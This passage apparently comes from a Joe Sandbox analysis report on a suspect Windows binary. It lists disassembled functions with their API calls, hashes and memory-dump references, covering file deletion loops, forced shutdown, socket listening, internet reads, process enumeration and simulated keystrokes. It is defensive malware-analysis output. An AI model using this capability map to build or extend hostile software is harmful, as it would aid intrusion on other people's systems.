            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01018310
            • SetCurrentDirectoryW.KERNEL32(?), ref: 01018324
            • SetCurrentDirectoryW.KERNEL32(?), ref: 01018356
            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0101838C
            • SetCurrentDirectoryW.KERNEL32(?), ref: 01018395
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CurrentDirectoryTime$File$Local$System
            • String ID: *.*
            • API String ID: 1464919966-438819550
            • Opcode ID: ea96e1ed5678cad329c4dd0ad104d1250f441a9cfe2e264687a463186c79ec48
            • Instruction ID: 576d95074c4188f58028d68f253fce575682d9ffb4bee390d8880db2e80de802
            • Opcode Fuzzy Hash: ea96e1ed5678cad329c4dd0ad104d1250f441a9cfe2e264687a463186c79ec48
            • Instruction Fuzzy Hash: BA619BB25083059FD710EF64C8449AEB3E8FF89314F08895EF989D7251DB39EA45CB92
            Function 0100D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA3A97,?,?,00FA2E7F,?,?,?,00000000), ref: 00FA3AC2
              • Part of subcall function 0100E199: GetFileAttributesW.KERNEL32(?,0100CF95), ref: 0100E19A
            • FindFirstFileW.KERNEL32(?,?), ref: 0100D122
            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0100D1DD
            • MoveFileW.KERNEL32(?,?), ref: 0100D1F0
            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0100D20D
            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0100D237
              • Part of subcall function 0100D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0100D21C,?,?), ref: 0100D2B2
            • FindClose.KERNEL32(00000000,?,?,?), ref: 0100D253
            • FindClose.KERNEL32(00000000), ref: 0100D264
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
            • String ID: \*.*
            • API String ID: 1946585618-1173974218
            • Opcode ID: 1ac16151235a28d3c06d52f92c338823b880882840f1f52edb9c3e83ec31a88f
            • Instruction ID: 82837c88b0846e01de50a66ce536c5fdbd73b20d35f414aa3571276d42eef465
            • Opcode Fuzzy Hash: 1ac16151235a28d3c06d52f92c338823b880882840f1f52edb9c3e83ec31a88f
            • Instruction Fuzzy Hash: D9618E7180511DABEF06EBE4DE529EDB7B9AF25300F2040A5E44273191EB39AF09DB60
            Function 0101ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
            • String ID:
            • API String ID: 1737998785-0
            • Opcode ID: b91cb3640de6f909d6a2f68f1bf0845a3282300aa0f7458474a48a985a9e858d
            • Instruction ID: b5d77441de52cf7c1581803d846ad6dd607f40e0ebbde0726c3dfa23f82d7efa
            • Opcode Fuzzy Hash: b91cb3640de6f909d6a2f68f1bf0845a3282300aa0f7458474a48a985a9e858d
            • Instruction Fuzzy Hash: 8341BF35604611AFE321DF29D588F19BBE5FF44318F04C099E89A9B6A6C73AFC41CB90
            Function 0100E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 010016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0100170D
              • Part of subcall function 010016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0100173A
              • Part of subcall function 010016C3: GetLastError.KERNEL32 ref: 0100174A
            • ExitWindowsEx.USER32(?,00000000), ref: 0100E932
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
            • String ID: $ $@$SeShutdownPrivilege
            • API String ID: 2234035333-3163812486
            • Opcode ID: f99a937e75e87237cd5d79fffe9cc2cca2259b58ec7cb325a82ff74b5ac6b193
            • Instruction ID: 78be48224caa5fd4468ee7a0fa459039acd7a4a86a38222e692d2b7925ded817
            • Opcode Fuzzy Hash: f99a937e75e87237cd5d79fffe9cc2cca2259b58ec7cb325a82ff74b5ac6b193
            • Instruction Fuzzy Hash: 8C01D673610211ABFBA666B8DD85BFF729CA714750F054D66FDC2F21C1D6A55C4082A0
            Function 01021204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
            Download Yara Rule
            APIs
            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 01021276
            • WSAGetLastError.WSOCK32 ref: 01021283
            • bind.WSOCK32(00000000,?,00000010), ref: 010212BA
            • WSAGetLastError.WSOCK32 ref: 010212C5
            • closesocket.WSOCK32(00000000), ref: 010212F4
            • listen.WSOCK32(00000000,00000005), ref: 01021303
            • WSAGetLastError.WSOCK32 ref: 0102130D
            • closesocket.WSOCK32(00000000), ref: 0102133C
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorLast$closesocket$bindlistensocket
            • String ID:
            • API String ID: 540024437-0
            • Opcode ID: 37383c436352a7e263eaeff4e6df7e475f4db40477ce582fce3ffe44bb66a582
            • Instruction ID: 1a0c1be53ef648fcac77088f8c4fbedd7ff984fc1aa6b9fb5a27eaaf2060ed70
            • Opcode Fuzzy Hash: 37383c436352a7e263eaeff4e6df7e475f4db40477ce582fce3ffe44bb66a582
            • Instruction Fuzzy Hash: 2541A5716001109FE720DF28C584B29BBE6BF46314F1880C9E9969F297C775ED85CBE1
            Function 0100D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA3A97,?,?,00FA2E7F,?,?,?,00000000), ref: 00FA3AC2
              • Part of subcall function 0100E199: GetFileAttributesW.KERNEL32(?,0100CF95), ref: 0100E19A
            • FindFirstFileW.KERNEL32(?,?), ref: 0100D420
            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0100D470
            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0100D481
            • FindClose.KERNEL32(00000000), ref: 0100D498
            • FindClose.KERNEL32(00000000), ref: 0100D4A1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
            • String ID: \*.*
            • API String ID: 2649000838-1173974218
            • Opcode ID: 7d0dafe762f5dc1aeb13b0fc24223ccadd0c837b8a419a846c7d4f0ff9b19a34
            • Instruction ID: b66d0d5b6bdbafa11609518f6b459b22d963a4b3a2816f71efe874964471b7d4
            • Opcode Fuzzy Hash: 7d0dafe762f5dc1aeb13b0fc24223ccadd0c837b8a419a846c7d4f0ff9b19a34
            • Instruction Fuzzy Hash: EA3180B100C3419FD311EFA4D8918EFB7ECAE96200F444A1EF4D593191EB29AA09D763
            Function 00FDE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: __floor_pentium4
            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
            • API String ID: 4168288129-2761157908
            • Opcode ID: 2f3da188fb4ae81aca61575032d55fa1a11259ccb3692a57e4a278262842f2db
            • Instruction ID: 15266cbc255ef9bb8f51671372de751ba79bbbf96df0fbdf90688b0653066a1f
            • Opcode Fuzzy Hash: 2f3da188fb4ae81aca61575032d55fa1a11259ccb3692a57e4a278262842f2db
            • Instruction Fuzzy Hash: 86C24C72E046298BDB25DF28DD40BE9B7B6EB44314F1841EBD44EE7240D778AE85AF40
            Function 0101648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
            Download Yara Rule
            APIs
            • _wcslen.LIBCMT ref: 010164DC
            • CoInitialize.OLE32(00000000), ref: 01016639
            • CoCreateInstance.OLE32(0103FCF8,00000000,00000001,0103FB68,?), ref: 01016650
            • CoUninitialize.OLE32 ref: 010168D4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateInitializeInstanceUninitialize_wcslen
            • String ID: .lnk
            • API String ID: 886957087-24824748
            • Opcode ID: c010ac0f7e8efcd1818cd4aa04fda7c6ad16dfc8bab58a6d059165585ccdf784
            • Instruction ID: 28ad5c6acd2d188a7001d1cdca4f433b49e216df746268eac7dba345089e6d77
            • Opcode Fuzzy Hash: c010ac0f7e8efcd1818cd4aa04fda7c6ad16dfc8bab58a6d059165585ccdf784
            • Instruction Fuzzy Hash: 4ED136B1508201AFD304EF24CC81A6BB7E8EF99704F04896DF5958B295EB75E905CBA2
            Function 01019B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 01019B78
            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 01019C8B
              • Part of subcall function 01013874: GetInputState.USER32 ref: 010138CB
              • Part of subcall function 01013874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01013966
            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 01019BA8
            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 01019C75
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
            • String ID: *.*
            • API String ID: 1972594611-438819550
            • Opcode ID: 30ef2d48da841cb156789f78eb38012e0dfe144c497cf9f1e9edf17a8d2bc9cc
            • Instruction ID: 1c0582c64fead1f5cf3c460fc2e66f5e0663611e85732777ad455002934c5987
            • Opcode Fuzzy Hash: 30ef2d48da841cb156789f78eb38012e0dfe144c497cf9f1e9edf17a8d2bc9cc
            • Instruction Fuzzy Hash: A041B17180420E9FDF54DF68C995AEE7BF8FF05304F10409AE885A2194EB399A84CF60
            Function 00FB997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB9BB2
            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00FB9A4E
            • GetSysColor.USER32(0000000F), ref: 00FB9B23
            • SetBkColor.GDI32(?,00000000), ref: 00FB9B36
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Color$LongProcWindow
            • String ID:
            • API String ID: 3131106179-0
            • Opcode ID: fb53160a0263bda19451c5d883e6241c5b0cbd4c7f41e500fb720e514ea3332b
            • Instruction ID: 6a1815989f0ecc13c2a7ef9d0b5536c692b431ecd8295e697f6d23391131926b
            • Opcode Fuzzy Hash: fb53160a0263bda19451c5d883e6241c5b0cbd4c7f41e500fb720e514ea3332b
            • Instruction Fuzzy Hash: 51A12B72A0C508AEE724BA3E8C48FFB765DDF82360B144109F742D66D5CAA99D01FB71
            Function 01021806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 0102304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0102307A
              • Part of subcall function 0102304E: _wcslen.LIBCMT ref: 0102309B
            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0102185D
            • WSAGetLastError.WSOCK32 ref: 01021884
            • bind.WSOCK32(00000000,?,00000010), ref: 010218DB
            • WSAGetLastError.WSOCK32 ref: 010218E6
            • closesocket.WSOCK32(00000000), ref: 01021915
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
            • String ID:
            • API String ID: 1601658205-0
            • Opcode ID: e25adb235705bb972f53d8208f2521ad7f4c58c8308136f25dc4664e27ea11c2
            • Instruction ID: a1307a7b014a1d2b467512297012473bf429739838d5a09dc8863b13c72437ad
            • Opcode Fuzzy Hash: e25adb235705bb972f53d8208f2521ad7f4c58c8308136f25dc4664e27ea11c2
            • Instruction Fuzzy Hash: 22519571A00210AFEB10EF24C886F6A77E5AF45718F088498F959AF3C7D775ED418BA1
            Function 0101CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
            Download Yara Rule
            APIs
            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0101CF38
            • InternetReadFile.WININET(?,00000000,?,?), ref: 0101CF6F
            • GetLastError.KERNEL32(?,00000000,?,?,?,0101C21E,00000000), ref: 0101CFB4
            • SetEvent.KERNEL32(?,?,00000000,?,?,?,0101C21E,00000000), ref: 0101CFC8
            • SetEvent.KERNEL32(?,?,00000000,?,?,?,0101C21E,00000000), ref: 0101CFF2
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
            • String ID:
            • API String ID: 3191363074-0
            • Opcode ID: add4c519d4f05468ee3f44d20453646d72dc0c9c4a7ef989a3882966623b23d9
            • Instruction ID: 40096aadc3849c70ff5586c71ef2143699bd9fda43932de6357b0b73bb878668
            • Opcode Fuzzy Hash: add4c519d4f05468ee3f44d20453646d72dc0c9c4a7ef989a3882966623b23d9
            • Instruction Fuzzy Hash: 80315E71540205EFFB20DFA9CA84AAFBBFCEB14350B10446EF596E2145DB38EA45DB60
            Function 01031C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$EnabledForegroundIconicVisibleZoomed
            • String ID:
            • API String ID: 292994002-0
            • Opcode ID: f68252fe098f7b97b0cb41ff05d24dbdd2d495c4b84dc7340918d29b80653ada
            • Instruction ID: 1f7f8713c4055d3e480ffeef1877a7b27dd05afc637edc53426b0933d75afb79
            • Opcode Fuzzy Hash: f68252fe098f7b97b0cb41ff05d24dbdd2d495c4b84dc7340918d29b80653ada
            • Instruction Fuzzy Hash: F921D6317102055FE7219F1AC844B5A7BEDEFC9314F1880A9E8C5DB341C776D842CB90
            Function 00FA8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
            • API String ID: 0-1546025612
            • Opcode ID: 5e7b32fb628c17da67be2575ea099a89678b59f804e82aa2e1824dcad0f20642
            • Instruction ID: c3e15aa3d7307387badfbf13df50455670e0924809da2eb9a1baa13529abc541
            • Opcode Fuzzy Hash: 5e7b32fb628c17da67be2575ea099a89678b59f804e82aa2e1824dcad0f20642
            • Instruction Fuzzy Hash: 32A2B1B1E0025ACBDF24CF59C8407AEB7B1BF55764F2481AAD815A7380DB749D82EF90
            Function 0102A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
            Download Yara Rule
            APIs
            • CreateToolhelp32Snapshot.KERNEL32 ref: 0102A6AC
            • Process32FirstW.KERNEL32(00000000,?), ref: 0102A6BA
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • Process32NextW.KERNEL32(00000000,?), ref: 0102A79C
            • CloseHandle.KERNEL32(00000000), ref: 0102A7AB
              • Part of subcall function 00FBCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00FE3303,?), ref: 00FBCE8A
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
            • String ID:
            • API String ID: 1991900642-0
            • Opcode ID: d28666cd44c6b9cb0fbc89f15cce4ab9c9b945e14f32fb5ed742a7b3542ac719
            • Instruction ID: 9f7eb9858fc71b59527d8dae68f00340ff7ea1410f6af949439bfb3d613cf210
            • Opcode Fuzzy Hash: d28666cd44c6b9cb0fbc89f15cce4ab9c9b945e14f32fb5ed742a7b3542ac719
            • Instruction Fuzzy Hash: 4F516BB1508310AFD710EF24CC86A6BBBE8FF89754F00892DF58997251EB74E904DB92
            Function 0100AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
            Download Yara Rule
            APIs
            • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0100ABF1
            • SetKeyboardState.USER32(00000080,?,00008000), ref: 0100AC0D
            • PostMessageW.USER32(00000000,00000101,00000000), ref: 0100AC74
            • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0100ACC6
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: KeyboardState$InputMessagePostSend
            • String ID:
            • API String ID: 432972143-0
            • Opcode ID: 3e4a929e25374401e51ac7a5e1d49624bbe497d731a5028105e949465ac06cb1
            • Instruction ID: 609ff1526e1edab7087ba5bd9daa4d05ce7920618a8b3da55499043ec43d8867
            • Opcode Fuzzy Hash: 3e4a929e25374401e51ac7a5e1d49624bbe497d731a5028105e949465ac06cb1
            • Instruction Fuzzy Hash: F231F430B0475CEFFF378A698808FFE7AE5AB89324F05425AE4C9971D1C37989858751
            Function 00FDBB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
            Download Yara Rule
            APIs
            • _free.LIBCMT ref: 00FDBB7F
              • Part of subcall function 00FD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000), ref: 00FD29DE
